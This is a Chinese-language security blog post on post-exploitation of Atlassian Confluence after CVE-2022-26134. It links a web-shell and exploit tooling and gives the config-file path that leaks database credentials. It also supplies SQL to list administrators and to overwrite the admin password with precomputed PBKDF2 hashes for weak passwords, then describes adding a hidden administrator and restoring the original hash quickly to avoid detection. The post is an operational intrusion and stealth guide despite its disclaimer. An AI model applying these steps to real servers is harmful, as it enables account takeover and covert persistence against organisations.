攻防实战之Confluence后利用

admin 2024年11月14日22:39:10评论13 views字数 2151阅读7分10秒阅读模式
攻防实战之Confluence后利用

点击上方蓝字关注我们

1

攻防实战之Confluence后利用

漏洞验证

CVE-2022-26134首先验证漏洞是在的,但这并不是文章重点,也可使用脚本一键,但没必要。

项目地址:https://github.com/jbaines-r7/through_the_wire

攻防实战之Confluence后利用

Confluence后利用

现在的思路就是写shell获取系统权限——>再到数据库权限——>最后到管理员密码。这边管理员密码是密文加密在数据库中,解不开,因此解决的思路是将管理员用户密码修改为已知明文密码的密文(这边不能直接在数据库中添加字段,关系型数据库在单表中添加一条字段可能会出现问题),登录上后台以后,添加用户并加入管理员组,最后将管理员密码还原。
Confluence的后利用主要问题在于在Linux中搭建时,默认是Confluence用户权限,如下图所示,而confluence在linux中是没有写权限的,这也就是为什么有些人发现可以执行命令但是shell写不进去。因此处理这种问题最有效的方法就是无文件落地,写内存马。

攻防实战之Confluence后利用

打内存马

准备研究下Confluence内存马,但是好在已有大哥把Confluence的内存马整出来了,我这边只负责乘凉即可:

项目地址:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL

攻防实战之Confluence后利用

攻防实战之Confluence后利用

连接数据库

查找数据库配置文件

Confluence数据库默认配置文件如下,若未使用默认路径,全局搜索该配置文件即可
/var/atlassian/application-data/confluence/confluence.cfg.xml

攻防实战之Confluence后利用

可知数据库地址:192.168.159.133:5432 username:confluence password:confluence
选择哥斯拉数据库管理模块连接postgresql数据库:

攻防实战之Confluence后利用

修改admin密码

先查询所有管理员用户的id值,这步的目的主要是定位管理员用户
select u.id, u.user_name, u.active from cwd_user u join cwd_membership m on u.id=m.child_user_id join cwd_group g on m.parent_id=g.id join cwd_directory d on d.id=g.directory_id where g.group_name = 'confluence-administrators' and d.directory_name='Confluence Internal Directory';

攻防实战之Confluence后利用

可知admin为管理员

查看用户密码表

SELECT * FROM "cwd_user" limit 10

攻防实战之Confluence后利用

其中credential字段是密码密文,解不开,按照前面的思路,我们可以将其修改为我们已知的密文,登录上以后再改回来。

先保存admin密文备用

{PKCS5S2}xcOomVKqqDnMbMMrR3YyE3cP2ihgjkBTbwkfAMz1TaO+Kjxp/p+lcB1CV5sh7pKH

修改密码

修改密码需要改用户id值和已知密文

Id:根据查表admin的id为229377

Credential:

Ab123456对应密文——

{PKCS5S2}ltrb9LlmZ0QDCJvktxd45WgYLOgPt2XTV8X7av2p0mhPvIwofs9bHYVz2OXQ6/kF

123123对应密文——

{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk

123456对应密文——

{PKCS5S2}UokaJs5wj02LBUJABpGmkxvCX0q+IbTdaUfxy1M9tVOeI38j95MRrVxWjNCu6gsm

这边将密码改为123123

那么Sql语句为:

update cwd_user set credential = '{PKCS5S2}V1J8HcMvYsdtnETu2tjA1gFVQ1L3o+dAsNiooSAcSvpRcbkTR8K4Ha/iWgF145gk' where id=xxxxxx;

修改成功:

攻防实战之Confluence后利用

至此admin的密码被改为了123123

攻防实战之Confluence后利用

后续

后面紧接着就是一分钟内快速登录后台——>用户管理——>添加用户——>加管理员——>用上面方法重新将admin密码改回。速度要快动作要帅以免被发现。

攻防实战之Confluence后利用

攻防实战之Confluence后利用

自动化工具

这边推荐哥斯拉作者写的一个自动化工具,专门针对confluence后利用的,如果觉得上面手动利用麻烦的可以使用。

项目地址:https://github.com/BeichenDream/PostConfluence

下载并添加插件

攻防实战之Confluence后利用

功能模块如下,主要挑选三个介绍:

攻防实战之Confluence后利用

AddAdminUser 添加一个管理员

攻防实战之Confluence后利用

EnumAllUser 列举所有用户

攻防实战之Confluence后利用

EnumHibernateConfig 查看数据库配置文件

攻防实战之Confluence后利用

至此,Confluence后利用介绍完毕,有了管理员权限登录后台后,相信会给大家带来不小的惊喜,后面有时间会介绍其他后利用的姿势。

END

攻防实战之Confluence后利用

内部圈子一起内卷

攻防实战之Confluence后利用

部分大纲展示,详细看

👇👇👇

内卷链接

攻防实战之Confluence后利用

原文始发于微信公众号(哈拉少安全小队):攻防实战之Confluence后利用

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日22:39:10
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   攻防实战之Confluence后利用https://cn-sec.com/archives/1638033.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息